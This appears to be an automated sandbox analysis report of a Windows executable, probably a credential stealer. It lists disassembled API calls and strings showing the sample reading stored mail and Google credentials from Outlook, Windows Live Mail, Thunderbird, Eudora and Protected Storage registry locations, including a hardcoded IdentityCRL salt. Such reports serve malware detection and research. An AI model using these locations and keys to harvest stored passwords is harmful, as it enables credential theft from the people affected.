                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: strlen$memset$Close_mbscpy$AttributesEnvironmentExpandFileStrings_mbscatatoisprintf
                                                                                                              • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
                                                                                                              • API String ID: 1846531875-4223776976
                                                                                                              • Opcode ID: 1d5c9e5188f6b082a2305a72209a31590191ad01f9a44e6bfeac10cb5ccfbbc2
                                                                                                              • Instruction ID: 9c65708a615aa9161e76439fb3ec4404e3c7586a7422c94cf2faf2b42662f59f
                                                                                                              • Opcode Fuzzy Hash: 1d5c9e5188f6b082a2305a72209a31590191ad01f9a44e6bfeac10cb5ccfbbc2
                                                                                                              • Instruction Fuzzy Hash: 2291193290515D6AEB21D6618C86FDE77AC9F58304F1400FBF508F2182EB78EB858B6D

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                                • Part of subcall function 00404A99: LoadLibraryA.KERNEL32(comctl32.dll,771B0A60,?,00000000,?,?,?,0040CF60,771B0A60), ref: 00404AB8
                                                                                                                • Part of subcall function 00404A99: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                                                                                                • Part of subcall function 00404A99: FreeLibrary.KERNEL32(00000000,?,00000000,?,?,?,0040CF60,771B0A60), ref: 00404ADE
                                                                                                                • Part of subcall function 00404A99: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                                                                              • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040D190
                                                                                                              • DeleteObject.GDI32(?), ref: 0040D1A6
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                                                                                                              • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !
                                                                                                              • API String ID: 745651260-375988210
                                                                                                              • Opcode ID: 66dab05e126b40913f404dced1d7a1b7c9917f067a9e41187f19818bfede1135
                                                                                                              • Instruction ID: dea5423bbc6b84474d5379bd8edfb36e55d4f41410ab6b686afcfd17116e90de
                                                                                                              • Opcode Fuzzy Hash: 66dab05e126b40913f404dced1d7a1b7c9917f067a9e41187f19818bfede1135
                                                                                                              • Instruction Fuzzy Hash: 0A61AF71908345EBD7609FA1EC89A9FB7E8FF85704F00093FF544A21A1DB789805CB5A

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                                • Part of subcall function 004107F1: FreeLibrary.KERNELBASE(?,00410825,?,?,?,?,?,?,004041C4), ref: 004107FD
                                                                                                              • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C35
                                                                                                              • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C4A
                                                                                                              • _mbscpy.MSVCRT(?,?), ref: 00403E54
                                                                                                              Strings
                                                                                                              • www.google.com/Please log in to your Gmail account, xrefs: 00403C86
                                                                                                              • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D3B
                                                                                                              • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D6E
                                                                                                              • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CD6
                                                                                                              • PStoreCreateInstance, xrefs: 00403C44
                                                                                                              • pstorec.dll, xrefs: 00403C30
                                                                                                              • www.google.com/Please log in to your Google Account, xrefs: 00403C9A
                                                                                                              • Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403DA4
                                                                                                              • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CFB
                                                                                                              • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D42
                                                                                                              • www.google.com:443/Please log in to your Gmail account, xrefs: 00403C90
                                                                                                              • www.google.com:443/Please log in to your Google Account, xrefs: 00403CA4
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Library$AddressFreeLoadProc_mbscpy
                                                                                                              • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                                                                                                              • API String ID: 1197458902-317895162
                                                                                                              • Opcode ID: ad300f429030269d79da7f29e18846d437bf74986d1cc708d4c29655c4209bd3
                                                                                                              • Instruction ID: f12475a9e901df39a06d2b9041e3ab5decda6d4897279b708da5bb949cd86342
                                                                                                              • Opcode Fuzzy Hash: ad300f429030269d79da7f29e18846d437bf74986d1cc708d4c29655c4209bd3
                                                                                                              • Instruction Fuzzy Hash: 7C51C971600201B6E714EF71CD86FDAB66CAF01709F14013FF915B61C2DBBDA658C699

                                                                                                              Control-flow Graph

                                                                                                              control_flow_graph 231 44b49f-44b4b0 call 444e38 GetModuleHandleA 235 444c87-444d00 __set_app_type __p__fmode __p__commode call 444e34 231->235 236 444c68-444c73 231->236 242 444d02-444d0d __setusermatherr 235->242 243 444d0e-444d68 call 444e22 _initterm __getmainargs _initterm 235->243 236->235 237 444c75-444c85 236->237 237->235 242->243 246 444d6a-444d72 243->246 247 444d74-444d76 246->247 248 444d78-444d7b 246->248 247->246 247->248 249 444d81-444d85 248->249 250 444d7d-444d7e 248->250 251 444d87-444d89 249->251 252 444d8b-444dc6 GetStartupInfoA GetModuleHandleA call 40cf44 249->252 250->249 251->250 251->252 257 444dcf-444e0f _cexit call 444e71 252->257 258 444dc8-444dc9 exit 252->258 258->257
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                                                                              • String ID: h4ND$k{v
                                                                                                              • API String ID: 3662548030-3410959870
                                                                                                              • Opcode ID: 2fd2f5ec857dcc0751115c7934250d8e7778a8a50373ba8a776a572aa6a6b888
                                                                                                              • Instruction ID: 35bbd85eb0bb2ce5e1f1b9c4bc8677619723fc104b62ea38f54f9f601267cc63
                                                                                                              • Opcode Fuzzy Hash: 2fd2f5ec857dcc0751115c7934250d8e7778a8a50373ba8a776a572aa6a6b888
                                                                                                              • Instruction Fuzzy Hash: D941D3B5C023449FEB619FA4DC847AD7BB4FB49325B28412BE451A32A1D7788D41CB5C

                                                                                                              Control-flow Graph

                                                                                                              control_flow_graph 262 40fb00-40fb35 call 44b090 RegOpenKeyExA 265 40fc37-40fc3d 262->265 266 40fb3b-40fb4f RegOpenKeyExA 262->266 267 40fb55-40fb7e RegQueryValueExA 266->267 268 40fc2d-40fc31 RegCloseKey 266->268 269 40fc23-40fc27 RegCloseKey 267->269 270 40fb84-40fb93 call 404734 267->270 268->265 269->268 270->269 273 40fb99-40fbd1 call 4047a5 270->273 273->269 276 40fbd3-40fbdb 273->276 277 40fc19-40fc1d LocalFree 276->277 278 40fbdd-40fc14 memcpy * 2 call 40f802 276->278 277->269 278->277
                                                                                                              APIs
                                                                                                              • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB31
                                                                                                              • RegOpenKeyExA.KERNELBASE(?,Dynamic Salt,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB4B
                                                                                                              • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E7F,?), ref: 0040FB76
                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,00403E7F,?), ref: 0040FC27
                                                                                                                • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                                • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                              • memcpy.MSVCRT(?,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FBE4
                                                                                                              • memcpy.MSVCRT(?,?,?), ref: 0040FBF9
                                                                                                                • Part of subcall function 0040F802: RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,?,0040FC19,?,?,?,?), ref: 0040F82C
                                                                                                                • Part of subcall function 0040F802: memset.MSVCRT ref: 0040F84A
                                                                                                                • Part of subcall function 0040F802: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                                                                                                • Part of subcall function 0040F802: RegCloseKey.ADVAPI32(?), ref: 0040F95F
                                                                                                              • LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FC1D
                                                                                                              • RegCloseKey.KERNELBASE(?,?,?,?,?,00403E7F,?), ref: 0040FC31
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CloseOpen$memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
                                                                                                              • String ID: %GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd$Dynamic Salt$Software\Microsoft\IdentityCRL$Value
                                                                                                              • API String ID: 2768085393-1693574875
                                                                                                              • Opcode ID: 7320e33f30be2fbc30f5bd1c4a58e072b2ce45667eb80885bc3b0e2d1fc45eb5
                                                                                                              • Instruction ID: dc42a4d3869b5799c80e2b369f36587618a74ee4c7744a3ab9dbe2425e101413
                                                                                                              • Opcode Fuzzy Hash: 7320e33f30be2fbc30f5bd1c4a58e072b2ce45667eb80885bc3b0e2d1fc45eb5
                                                                                                              • Instruction Fuzzy Hash: BA316F72508348AFE750DF51DC81E5BBBECFB88358F04093EBA94E2151D735D9188B6A

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 0044430B
                                                                                                                • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075A0
                                                                                                                • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075AB
                                                                                                                • Part of subcall function 0040759E: _mbscat.MSVCRT ref: 004075C2
                                                                                                                • Part of subcall function 00410DBB: memset.MSVCRT ref: 00410E10
                                                                                                                • Part of subcall function 00410DBB: RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                                                                                                • Part of subcall function 00410DBB: _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                                                                              • memset.MSVCRT ref: 00444379
                                                                                                              • memset.MSVCRT ref: 00444394
                                                                                                                • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                              • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004443CD
                                                                                                              • strlen.MSVCRT ref: 004443DB
                                                                                                              • _strcmpi.MSVCRT ref: 00444401
                                                                                                              Strings
                                                                                                              • Store Root, xrefs: 004443A5
                                                                                                              • \Microsoft\Windows Live Mail, xrefs: 00444350
                                                                                                              • \Microsoft\Windows Mail, xrefs: 00444329
                                                                                                              • Software\Microsoft\Windows Live Mail, xrefs: 004443AA
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memset$strlen$Close$EnvironmentExpandStrings_mbscat_mbscpy_strcmpi
                                                                                                              • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                                                                                                              • API String ID: 832325562-2578778931
                                                                                                              • Opcode ID: f06a6af35cb714c64aa9cbb6cf4603c577f85108f01cf4c992da9f1fa1720a8e
                                                                                                              • Instruction ID: c969096c6c8075cae9da81fbffcb27ba025b1fc1210c9b39c3855a2ab2b3ab2e
                                                                                                              • Opcode Fuzzy Hash: f06a6af35cb714c64aa9cbb6cf4603c577f85108f01cf4c992da9f1fa1720a8e
                                                                                                              • Instruction Fuzzy Hash: A73197725083446BE320EA99DC47FCBB7DC9B85315F14441FF64897182D678E548877A

                                                                                                              Control-flow Graph

                                                                                                              control_flow_graph 301 40f460-40f5bd memset * 2 call 4078ba * 2 RegOpenKeyExA 306 40f5c3-40f5ea RegQueryValueExA 301->306 307 40f6d9-40f6df 301->307 308 40f6d0-40f6d3 RegCloseKey 306->308 309 40f5f0-40f5f4 306->309 308->307 309->308 310 40f5fa-40f604 309->310 311 40f606-40f618 call 40466b call 404734 310->311 312 40f677 310->312 322 40f66a-40f675 call 404785 311->322 323 40f61a-40f63e call 4047a5 311->323 313 40f67a-40f67d 312->313 313->308 315 40f67f-40f6bf call 4012ee RegQueryValueExA 313->315 315->308 321 40f6c1-40f6cf 315->321 321->308 322->313 323->322 328 40f640-40f643 323->328 329 40f661-40f664 LocalFree 328->329 330 40f645-40f65a memcpy 328->330 329->322 330->329
                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 0040F567
                                                                                                              • memset.MSVCRT ref: 0040F57F
                                                                                                                • Part of subcall function 004078BA: _mbsnbcat.MSVCRT ref: 004078DA
                                                                                                              • RegOpenKeyExA.KERNELBASE(80000001,00000082,00000000,00020019,?,?,?,?,?,00000000), ref: 0040F5B5
                                                                                                              • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040F5E2
                                                                                                              • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F6B7
                                                                                                                • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                                                                                • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                                • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                              • memcpy.MSVCRT(00000020,?,?,?,00000000,?,?,?,?,?,00000000), ref: 0040F652
                                                                                                              • LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040F664
                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000), ref: 0040F6D3
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: QueryValuememset$AddressCloseFreeLibraryLoadLocalOpenProc_mbscpy_mbsnbcatmemcpy
                                                                                                              • String ID:
                                                                                                              • API String ID: 2012582556-3916222277
                                                                                                              • Opcode ID: 8f617e2db47743eab2de2860531f70ca5c395556099eb0f489e65365eb291258
                                                                                                              • Instruction ID: 8a535e2a1d92942c08e22e27bc62a3a9d9c5418ddd7b2e408e782496f1cf9495
                                                                                                              • Opcode Fuzzy Hash: 8f617e2db47743eab2de2860531f70ca5c395556099eb0f489e65365eb291258
                                                                                                              • Instruction Fuzzy Hash: 9E81FC218047CEDEDB31DBBC8C485DDBF745B17224F0843A9E5B47A2E2D3245646C7AA

                                                                                                              Control-flow Graph

                                                                                                              control_flow_graph 331 4037ca-40381c memset * 2 call 444551 334 4038e2-4038e5 331->334 335 403822-403882 call 4021b6 call 406f06 * 2 strchr 331->335 342 403884-403895 _mbscpy 335->342 343 403897-4038a2 strlen 335->343 344 4038bf-4038dd _mbscpy call 4023e5 342->344 343->344 345 4038a4-4038bc sprintf 343->345 344->334 345->344
                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 004037EB
                                                                                                              • memset.MSVCRT ref: 004037FF
                                                                                                                • Part of subcall function 00444551: memset.MSVCRT ref: 00444573
                                                                                                                • Part of subcall function 00444551: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                                                                                                                • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001,00000104,?,?,?,?,?,00000000), ref: 00406F20
                                                                                                              • strchr.MSVCRT ref: 0040386E
                                                                                                              • _mbscpy.MSVCRT(?,?,?,?,?), ref: 0040388B
                                                                                                              • strlen.MSVCRT ref: 00403897
                                                                                                              • sprintf.MSVCRT ref: 004038B7
                                                                                                              • _mbscpy.MSVCRT(?,?,?,?,?), ref: 004038CD
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memset$_mbscpystrlen$Closememcpysprintfstrchr
                                                                                                              • String ID: %s@yahoo.com
                                                                                                              • API String ID: 317221925-3288273942
                                                                                                              • Opcode ID: 5a56a1554c10d755001c1ca11538bf46cd5ff9b3743cfe338c5787e90ef4e93f
                                                                                                              • Instruction ID: 76d3f49adc6711096ede71316d8c54080aa8a6e72e6628a7d10ff16d2d587f45
                                                                                                              • Opcode Fuzzy Hash: 5a56a1554c10d755001c1ca11538bf46cd5ff9b3743cfe338c5787e90ef4e93f
                                                                                                              • Instruction Fuzzy Hash: 4B2154B3D001285EEB11EA54DD42FDA77ACDF85308F0404EBB649F7041E678AF888A59

                                                                                                              Control-flow Graph

                                                                                                              control_flow_graph 347 404a99-404ac2 LoadLibraryA 348 404ac4-404ad2 GetProcAddress 347->348 349 404aec-404af4 347->349 350 404ad4-404ad8 348->350 351 404add-404ae6 FreeLibrary 348->351 355 404af5-404afa 349->355 354 404adb 350->354 351->349 352 404ae8-404aea 351->352 352->355 354->351 356 404b13-404b17 355->356 357 404afc-404b12 MessageBoxA 355->357
                                                                                                              APIs
                                                                                                              • LoadLibraryA.KERNEL32(comctl32.dll,771B0A60,?,00000000,?,?,?,0040CF60,771B0A60), ref: 00404AB8
                                                                                                              • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                                                                                              • FreeLibrary.KERNEL32(00000000,?,00000000,?,?,?,0040CF60,771B0A60), ref: 00404ADE
                                                                                                              • MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Library$AddressFreeLoadMessageProc
                                                                                                              • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                              • API String ID: 2780580303-317687271
                                                                                                              • Opcode ID: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
                                                                                                              • Instruction ID: 488ab604db7d7bb3946a6a0ddadc23e58717ff74c8dc9d9f2a6c2f93e1cc5ebb
                                                                                                              • Opcode Fuzzy Hash: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
                                                                                                              • Instruction Fuzzy Hash: F401D679B512106BE7115BE59C89F6BBAACDB86759B040135BA02F1180DAB899018A5C

                                                                                                              Control-flow Graph

                                                                                                              control_flow_graph 358 4034e4-403544 memset * 2 call 410b1e 361 403580-403582 358->361 362 403546-40357f _mbscpy call 406d55 _mbscat call 4033f0 358->362 362->361
                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 00403504
                                                                                                              • memset.MSVCRT ref: 0040351A
                                                                                                                • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                              • _mbscpy.MSVCRT(00000000,00000000), ref: 00403555
                                                                                                                • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                                                                • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                                                              • _mbscat.MSVCRT ref: 0040356D
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _mbscatmemset$Close_mbscpystrlen
                                                                                                              • String ID: InstallPath$Software\Group Mail$fb.dat
                                                                                                              • API String ID: 3071782539-966475738
                                                                                                              • Opcode ID: e8255885af10a91bc56e48e40ef87396276e308e7910b77f5f681434f29254a3
                                                                                                              • Instruction ID: a2fd564f6d67a76fe1541fb13c78ccc0c8ee6374decffd3371ae058987aad369
                                                                                                              • Opcode Fuzzy Hash: e8255885af10a91bc56e48e40ef87396276e308e7910b77f5f681434f29254a3
                                                                                                              • Instruction Fuzzy Hash: C201FC7694416875E750F6659C47FCAB66CCB64705F0400A7BA48F30C2DAF8BBC486A9

                                                                                                              Control-flow Graph

                                                                                                              control_flow_graph 367 40ccd7-40cd06 ??2@YAPAXI@Z 368 40cd08-40cd0d 367->368 369 40cd0f 367->369 370 40cd11-40cd24 ??2@YAPAXI@Z 368->370 369->370 371 40cd26-40cd2d call 404025 370->371 372 40cd2f 370->372 374 40cd31-40cd57 371->374 372->374 376 40cd66-40cdd9 call 407088 call 4019b5 memset LoadIconA call 4019b5 _mbscpy 374->376 377 40cd59-40cd60 DeleteObject 374->377 377->376
                                                                                                              APIs
                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000014,00000000), ref: 0040CCFE
                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00001324,00000000), ref: 0040CD1C
                                                                                                              • DeleteObject.GDI32(?), ref: 0040CD5A
                                                                                                              • memset.MSVCRT ref: 0040CD96
                                                                                                              • LoadIconA.USER32(00000065), ref: 0040CDA6
                                                                                                              • _mbscpy.MSVCRT(?,00000000,?,00000000), ref: 0040CDC4
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ??2@$DeleteIconLoadObject_mbscpymemset
                                                                                                              • String ID:
                                                                                                              • API String ID: 2054149589-0
                                                                                                              • Opcode ID: fd02f05bf49073eee5ccc1a550db9cbce84ddbb83c717146c7427eb187f58741
                                                                                                              • Instruction ID: e49e2262ea613e2b532621416bf92f05b9d60d1a181aada648b692035ce2a44d
                                                                                                              • Opcode Fuzzy Hash: fd02f05bf49073eee5ccc1a550db9cbce84ddbb83c717146c7427eb187f58741
                                                                                                              • Instruction Fuzzy Hash: C921A1B0900360DBDB10DF749DC97897BA8EB40B04F1405BBED08FF286D7B895408BA8

                                                                                                              Control-flow Graph

                                                                                                              control_flow_graph 384 44b40e-44b415 GetModuleHandleA 385 44b455 384->385 386 44b417-44b426 call 44b42b 384->386 388 44b457-44b45b 385->388 395 44b48d 386->395 396 44b428-44b433 GetProcAddress 386->396 390 44b45d-44b465 GetModuleHandleA 388->390 391 44b49a call 44b49f 388->391 394 44b467-44b46f 390->394 394->394 397 44b471-44b474 394->397 399 44b48e-44b496 395->399 396->385 400 44b435-44b442 VirtualProtect 396->400 397->388 398 44b476-44b478 397->398 401 44b47e-44b486 398->401 402 44b47a-44b47c 398->402 408 44b498 399->408 404 44b454 400->404 405 44b444-44b452 VirtualProtect 400->405 406 44b487-44b488 GetProcAddress 401->406 402->406 404->385 405->404 406->395 408->397
                                                                                                              APIs
                                                                                                              • GetModuleHandleA.KERNEL32(0044B405), ref: 0044B40E
                                                                                                              • GetModuleHandleA.KERNEL32(?,0044B405), ref: 0044B460
                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 0044B488
                                                                                                                • Part of subcall function 0044B42B: GetProcAddress.KERNEL32(00000000,0044B41C), ref: 0044B42C
                                                                                                                • Part of subcall function 0044B42B: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                                                                                                • Part of subcall function 0044B42B: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                               • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                               • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 2099061454-0
